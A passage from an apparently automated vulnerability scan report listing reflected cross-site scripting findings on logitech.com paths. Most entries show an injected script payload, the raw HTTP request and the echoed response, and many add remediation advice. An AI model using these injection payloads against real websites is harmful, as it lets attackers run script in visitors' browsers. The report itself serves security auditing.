Host:   http://www.logitech.com
Path:   /en-us/1039

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e388f</script><script>alert(1)</script>2873378b32d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/1039e388f</script><script>alert(1)</script>2873378b32d HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','1039e388f</script><script>alert(1)</script>2873378b32d' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.174. http://www.logitech.com/en-us/265/6687 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/265/6687

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5285"%3bac7931b086f was submitted in the REST URL parameter 1. This input was echoed as f5285";ac7931b086f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-usf5285"%3bac7931b086f/265/6687 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-usf5285";ac7931b086f/265/6687";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.175. http://www.logitech.com/en-us/265/6687 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/265/6687

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c03e5"><script>alert(1)</script>389fde72b39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-usc03e5"><script>alert(1)</script>389fde72b39/265/6687 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-usc03e5"><script>alert(1)</script>389fde72b39/265/6687">
...[SNIP]...

1.176. http://www.logitech.com/en-us/265/6687 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/265/6687

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 385bf</script><script>alert(1)</script>b74a008f78e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /385bf</script><script>alert(1)</script>b74a008f78e/265/6687 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','385bf</script><script>alert(1)</script>b74a008f78e/265/6687' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'D
...[SNIP]...

1.177. http://www.logitech.com/en-us/265/6687 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/265/6687

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55b7"><script>alert(1)</script>93fd2d266e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/265b55b7"><script>alert(1)</script>93fd2d266e/6687 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="265b55b7"><script>alert(1)</script>93fd2d266e/6687">
...[SNIP]...

1.178. http://www.logitech.com/en-us/265/6687 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/265/6687

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5770a</script><script>alert(1)</script>b80bf584b5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/2655770a</script><script>alert(1)</script>b80bf584b5a/6687 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','2655770a</script><script>alert(1)</script>b80bf584b5a/6687' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.179. http://www.logitech.com/en-us/265/6687 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/265/6687

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 710e4"><script>alert(1)</script>ca1f2a5e2f4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/265/6687710e4"><script>alert(1)</script>ca1f2a5e2f4 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="265/6687710e4"><script>alert(1)</script>ca1f2a5e2f4">
...[SNIP]...

1.180. http://www.logitech.com/en-us/265/6687 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/265/6687

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86485</script><script>alert(1)</script>c38881d4550 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/265/668786485</script><script>alert(1)</script>c38881d4550 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','265/668786485</script><script>alert(1)</script>c38881d4550' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.181. http://www.logitech.com/en-us/349/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61873"><script>alert(1)</script>23da25f57a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-us61873"><script>alert(1)</script>23da25f57a2/349/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us61873"><script>alert(1)</script>23da25f57a2/349">
...[SNIP]...

1.182. http://www.logitech.com/en-us/349/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa93f</script><script>alert(1)</script>252076e8926 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aa93f</script><script>alert(1)</script>252076e8926/349/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','aa93f</script><script>alert(1)</script>252076e8926/349' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dc
...[SNIP]...

1.183. http://www.logitech.com/en-us/349/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/349/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec3a2"%3bc56b2682970 was submitted in the REST URL parameter 1. This input was echoed as ec3a2";c56b2682970 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-usec3a2"%3bc56b2682970/349/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Apache
AK-control: no-store
Date: Fri, 12 Nov 2010 13:01:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-usec3a2";c56b2682970/349";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.184. http://www.logitech.com/en-us/349/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f30d"><script>alert(1)</script>b45076af784 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-us/3497f30d"><script>alert(1)</script>b45076af784/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="3497f30d"><script>alert(1)</script>b45076af784">
...[SNIP]...

1.185. http://www.logitech.com/en-us/349/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a24a</script><script>alert(1)</script>f85fa4b58f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/3498a24a</script><script>alert(1)</script>f85fa4b58f7/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','3498a24a</script><script>alert(1)</script>f85fa4b58f7' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.186. http://www.logitech.com/en-us/349/6072 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6072

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8518e</script><script>alert(1)</script>1319af95ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8518e</script><script>alert(1)</script>1319af95ca/349/6072 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','8518e</script><script>alert(1)</script>1319af95ca/349/6072' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'D
...[SNIP]...

1.187. http://www.logitech.com/en-us/349/6072 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6072

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd6c8"><script>alert(1)</script>50c8da53e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-usfd6c8"><script>alert(1)</script>50c8da53e7/349/6072 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-usfd6c8"><script>alert(1)</script>50c8da53e7/349/6072">
...[SNIP]...

1.188. http://www.logitech.com/en-us/349/6072 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/349/6072

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da40a"%3bf0266a417b6 was submitted in the REST URL parameter 1. This input was echoed as da40a";f0266a417b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-usda40a"%3bf0266a417b6/349/6072 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-usda40a";f0266a417b6/349/6072";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.189. http://www.logitech.com/en-us/349/6072 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6072

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39fb2"><script>alert(1)</script>423a22fa55a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/34939fb2"><script>alert(1)</script>423a22fa55a/6072 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="34939fb2"><script>alert(1)</script>423a22fa55a/6072">
...[SNIP]...

1.190. http://www.logitech.com/en-us/349/6072 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6072

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d16f0</script><script>alert(1)</script>de4a040ad2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/349d16f0</script><script>alert(1)</script>de4a040ad2d/6072 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349d16f0</script><script>alert(1)</script>de4a040ad2d/6072' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

